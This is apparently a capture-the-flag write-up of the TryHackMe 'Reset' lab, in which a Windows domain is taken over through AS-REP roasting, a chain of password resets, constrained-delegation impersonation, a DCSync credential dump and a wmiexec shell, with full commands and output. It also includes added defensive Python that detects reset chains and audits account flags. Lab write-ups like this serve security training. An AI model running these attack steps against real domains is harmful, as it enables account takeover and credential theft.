THM - Reset
Enumeration
Nmap
We run a classic nmap scan to identify the target system's open ports:
```
┌──(root㉿kali)-[~/thm/reset]
└─# nmap -p- -Pn -sV -sC -T4 10.112.180.16
Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-10 05:02 -0400
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 126 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-06-10 09:03:47Z)
135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 126
464/tcp open kpasswd5? syn-ack ttl 126
593/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 126
3268/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 126
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Issuer: commonName=HayStack.thm.corp
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-06-09T08:56:59
| Not valid after: 2026-12-09T08:56:59
| MD5: 36e9 0dcf 19cd 0cc9 b5c3 bff4 c3df ca59
| SHA-1: 4f69 4186 334b 8777 974b e091 5128 5641 ef6d a8f5
|_SHA-256: 5817 e911 572c 07a2 cc71 0c71 bc4c 00bf 0742 4ef1 da10 e239 99a0 7132 3c1f ee46
| rdp-ntlm-info:
| Target_Name: THM
| NetBIOS_Domain_Name: THM
| NetBIOS_Computer_Name: HAYSTACK
| DNS_Domain_Name: thm.corp
| DNS_Computer_Name: HayStack.thm.corp
| DNS_Tree_Name: thm.corp
| Product_Version: 10.0.17763
|_ System_Time: 2026-06-10T09:04:36+00:00
|_ssl-date: 2026-06-10T09:05:16+00:00; 0s from scanner time.
7680/tcp open tcpwrapped syn-ack ttl 126
9389/tcp open mc-nmf syn-ack ttl 126 .NET Message Framing
49668/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49671/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49675/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49694/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49699/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2026-06-10T09:04:38
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 37491/tcp): CLEAN (Timeout)
| Check 2 (port 45756/tcp): CLEAN (Timeout)
| Check 3 (port 63387/udp): CLEAN (Timeout)
| Check 4 (port 17477/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked

┌──(root㉿kali)-[~/thm/reset]
└─#
```
We found the names thm.corp and HayStack.thm.corp; let's add them to the /etc/hosts file and continue.
SMB
First I check whether guest access is allowed and list the shares. After that I collect the user names present on the system.
We have read and write permissions on the Data share.
It contains a number of pdf and txt files.
In them we can see the password of the user LILY ONEILL.
Initial Access
First, using the user list I had, I ran an impacket script to identify users with Kerberos pre-authentication disabled.
I try to crack the hashes I obtained with hashcat.
```
┌──(root㉿kali)-[~/thm/reset]
└─# hashcat -m 18200 hashes /usr/share/wordlists/rockyou.txt --force
[...]
$krb5asrep$23$TABATHA_BRITT@THM.CORP:db0f36931818857ec42b61dba4c8ca5e$ae146e99d814bab0c13a26c163ec345294595129a71a8a279f4516380742316622bf7a8ac85bc84956a532c24d5cc72873b4dded9bacb7d24bddb7f9828a9d2a0144b8d29bf0290da5f488c05b9330ebba764f45a938d9ade2b29eec32d84a2c3a3a35d10dfd72081e75de637dc59ee1b4e5c072789c5c567ddf9788bd5bb09ce3ce1f8d56739de95b98cf980f52b126cce3f1279e270b4ad06cd29f23f5e63fa0d68e0ec90a2475b5a82162332c51722c264756ebb956f77783dfbbcf7d434fdee797f2539e7fa77ac2ee6cba7054d5d2f461d8e0db4b90fcbc1c63e8c3ed70f79d6bdf:marlboro(1985)
```
Now we also have the user TABATHA_BRITT. Using the credentials I have, I look at the Kerberoastable service accounts.
I tried to crack the hashes of these services, but without success.
BloodHound
Examining the AD structure with BloodHound, we discover a path. Along this path the password-reset step is repeated until we reach the user darla.
```
┌──(root㉿kali)-[~/tools/windows]
└─# pth-net rpc password "SHAWNA_BRAY" 'Password123!' -U "thm.corp"/"TABATHA_BRITT"%'marlboro(1985)' -S 10.114.182.60
Password for [THM.CORP\TABATHA_BRITT]:
E_md4hash wrapper called.

┌──(root㉿kali)-[~/tools/windows]
└─# nxc smb 10.114.182.60 -u 'SHAWNA_BRAY' -p 'Password123!'
SMB 10.114.182.60 445 HAYSTACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:HAYSTACK) (domain:thm.corp) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.114.182.60 445 HAYSTACK [+] thm.corp\SHAWNA_BRAY:Password123!

┌──(root㉿kali)-[~/tools/windows]
└─# pth-net rpc password "CRUZ_HALL" 'Password123!' -U "thm.corp"/"SHAWNA_BRAY"%'Password123!' -S 10.114.182.60
E_md4hash wrapper called.

┌──(root㉿kali)-[~/tools/windows]
└─# pth-net rpc password "DARLA_WINTERS" 'Password123!' -U "thm.corp"/"CRUZ_HALL"%'Password123!' -S 10.114.182.60
E_md4hash wrapper called.

┌──(root㉿kali)-[~/tools/windows]
└─#
```
At the end of the chain we have access to the user darla.
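From the defender's side, the chain above (TABATHA_BRITT resets SHAWNA_BRAY, who resets CRUZ_HALL, who resets DARLA_WINTERS) leaves a distinctive trail in the Security log: each password reset (Event ID 4724) is performed by an account whose own password was reset minutes earlier. The Python below is an added example, not part of the original writeup; the event records are constructed, and the one-hour window and two-hop threshold are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample of Windows Security Event ID 4724 records ("An attempt was made
# to reset an account's password"), reduced to the three fields the check needs.
# Timestamps and the HELPDESK01 / CECILE_WONG / AUTOMATE events are invented.
SAMPLE_4724 = [
    {"time": "2026-06-10T09:20:11", "subject": "HELPDESK01", "target": "CECILE_WONG"},
    {"time": "2026-06-10T09:41:02", "subject": "TABATHA_BRITT", "target": "SHAWNA_BRAY"},
    {"time": "2026-06-10T09:43:37", "subject": "SHAWNA_BRAY", "target": "CRUZ_HALL"},
    {"time": "2026-06-10T09:45:10", "subject": "CRUZ_HALL", "target": "DARLA_WINTERS"},
    {"time": "2026-06-10T15:02:00", "subject": "CECILE_WONG", "target": "AUTOMATE"},
]


def find_reset_chains(events, window=timedelta(hours=1), min_hops=2):
    """Return maximal chains of password resets in which every resetting account
    had its own password reset (by the previous link) at most `window` earlier.

    A single reset is ordinary helpdesk activity; two or more hops in quick
    succession is the ACL-abuse pattern shown in the writeup."""
    events = sorted(events, key=lambda e: e["time"])   # ISO-8601 strings sort correctly
    latest = {}   # target account -> (time of its reset, chain of accounts leading to it)
    found = []
    for e in events:
        t = datetime.fromisoformat(e["time"])
        subj, tgt = e["subject"].upper(), e["target"].upper()
        prev = latest.get(subj)
        if prev is not None and t - prev[0] <= window:
            chain = prev[1] + [tgt]      # the subject was itself just reset: extend the chain
        else:
            chain = [subj, tgt]          # no recent reset of the subject: start a new chain
        latest[tgt] = (t, chain)
        if len(chain) - 1 >= min_hops:
            found.append(chain)
    # Report only maximal chains: drop any chain that is a strict prefix of a longer one.
    return [c for c in found
            if not any(len(o) > len(c) and o[:len(c)] == c for o in found)]


if __name__ == "__main__":
    for chain in find_reset_chains(SAMPLE_4724):
        print(" -> ".join(chain))
```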
The DARLA_WINTERS account has delegation rights, meaning that DARLA_WINTERS is allowed to "act under someone else's identity" towards the HAYSTACK server.
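The two account properties this writeup relies on, pre-authentication disabled (the AS-REP roast under Initial Access) and constrained delegation with protocol transition (the S4U2self/S4U2proxy request that follows), are both bits of the userAccountControl attribute and can be audited from one LDAP export. The Python below is an added example, not the author's tooling: the flag constants are the documented userAccountControl values, while the sample records, the OLD_SVC account and the assumption that DARLA_WINTERS carries TRUSTED_TO_AUTH_FOR_DELEGATION with msDS-AllowedToDelegateTo set to cifs/HayStack.thm.corp are constructed to match the behaviour shown.

```python
# userAccountControl bit flags, as documented for Active Directory.
ACCOUNTDISABLE = 0x2
NORMAL_ACCOUNT = 0x200
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
DONT_REQ_PREAUTH = 0x400000                 # Kerberos pre-authentication not required
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

# Constructed records in the shape of an LDAP search result. The flag values and the
# delegation target are assumptions chosen to reproduce what the writeup observed.
SAMPLE_USERS = [
    {"sAMAccountName": "TABATHA_BRITT",
     "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "DARLA_WINTERS",
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/HayStack.thm.corp"]},
    {"sAMAccountName": "Administrator",
     "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "OLD_SVC",           # invented, disabled: must not be reported
     "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQ_PREAUTH,
     "msDS-AllowedToDelegateTo": []},
]

PRIVILEGED = {"ADMINISTRATOR"}   # accounts that must never be impersonable through S4U


def audit_accounts(users, privileged=PRIVILEGED):
    """Return (account, finding) pairs for the three weaknesses the attack chain used."""
    findings = []
    for u in users:
        name, uac = u["sAMAccountName"], u["userAccountControl"]
        if uac & ACCOUNTDISABLE:
            continue   # a disabled account can be neither roasted nor used for delegation
        if uac & DONT_REQ_PREAUTH:
            findings.append((name, "pre-authentication not required (AS-REP roastable)"))
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            targets = ", ".join(u.get("msDS-AllowedToDelegateTo", [])) or "(no SPN listed)"
            findings.append((name, f"protocol transition allowed; can impersonate users to {targets}"))
        if name.upper() in privileged and not uac & NOT_DELEGATED:
            findings.append((name, "privileged account lacks NOT_DELEGATED (or Protected Users membership)"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_accounts(SAMPLE_USERS):
        print(f"{account}: {finding}")
```

Marking Administrator as "sensitive and cannot be delegated" (or placing it in Protected Users) is what stops the S4U2self step from minting a ticket in that user's name even while Darla keeps her delegation right.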
```
┌──(root㉿kali)-[~/thm/reset]
└─# faketime "$(ntpdate -q 10.114.138.148 | cut -d ' ' -f 1-3)" impacket-getST -spn cifs/HayStack.thm.corp -impersonate administrator -dc-ip 10.114.138.148 thm.corp/DARLA_WINTERS -hashes :2b576acbe6bcfda7294d6bd18041b8fe
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_HayStack.thm.corp@THM.CORP.ccache

┌──(root㉿kali)-[~/thm/reset]
└─# export KRB5CCNAME=administrator@cifs_HayStack.thm.corp@THM.CORP.ccache

┌──(root㉿kali)-[~/thm/reset]
└─# impacket-secretsdump -k -no-pass administrator@HayStack.thm.corp -dc-ip 10.114.138.148 -target-ip 10.114.138.148 -just-dc-user Administrator
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:067a84e5afaed843ed4a8fdac5facac3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f2313ddc9686cd8ea1e67586173d3218bdc897a3c717dea005d31d8280291d75
Administrator:aes128-cts-hmac-sha1-96:a221004822c82f96664e247308ce6904
Administrator:des-cbc-md5:1cdac7ae988a5b32
[*] Cleaning up...

┌──(root㉿kali)-[~/thm/reset]
└─#
```
Using Darla's credentials, I request a service ticket on behalf of the administrator. For Kerberos operations we have to watch the clock difference to the DC, so I wrap the request in the faketime command.
After saving the ticket I can perform DCSync, or get a shell directly.
```
┌──(root㉿kali)-[~/thm/reset]
└─# impacket-wmiexec -k -no-pass -dc-ip 10.114.138.148 administrator@HayStack.thm.corp -target-ip 10.114.138.148
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
thm\administrator

C:\>cd Users
C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users

08/21/2023 08:33 PM <DIR> .
08/21/2023 08:33 PM <DIR> ..
07/10/2023 10:23 AM <DIR> Administrator
01/26/2024 09:02 PM <DIR> automate
06/13/2026 06:24 PM <DIR> CECILE_WONG
06/16/2023 04:17 PM <DIR> Public
 0 File(s) 0 bytes
 6 Dir(s) 12,385,644,544 bytes free

C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\Administrator\Desktop

07/14/2023 07:23 AM <DIR> .
07/14/2023 07:23 AM <DIR> ..
06/21/2016 03:36 PM 527 EC2 Feedback.website
06/21/2016 03:36 PM 554 EC2 Microsoft Windows Guide.website
06/16/2023 04:37 PM 30 root.txt
 3 File(s) 1,111 bytes
 2 Dir(s) 12,385,447,936 bytes free

C:\Users\Administrator\Desktop>type root.txt
THM{RE_RE_RE_SET_AND_DELEGATE}

C:\Users\Administrator\Desktop>
```
And that's that.